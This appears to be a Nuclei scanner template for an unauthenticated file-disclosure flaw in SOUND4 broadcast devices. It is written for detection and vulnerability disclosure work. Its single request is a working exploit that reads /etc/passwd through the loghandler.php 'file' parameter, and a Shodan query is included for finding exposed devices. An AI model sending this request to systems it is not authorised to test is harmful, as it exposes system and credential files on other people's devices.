id: sound4-file-disclosure

info:
  name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
  author: arafatansari
  severity: medium
  description: |
    The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
  reference:
    - https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
  metadata:
    shodan-query: http.html:"SOUND4"
    verified: "true"
  tags: packetstorm,lfi,sound4,unauth,disclosure

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
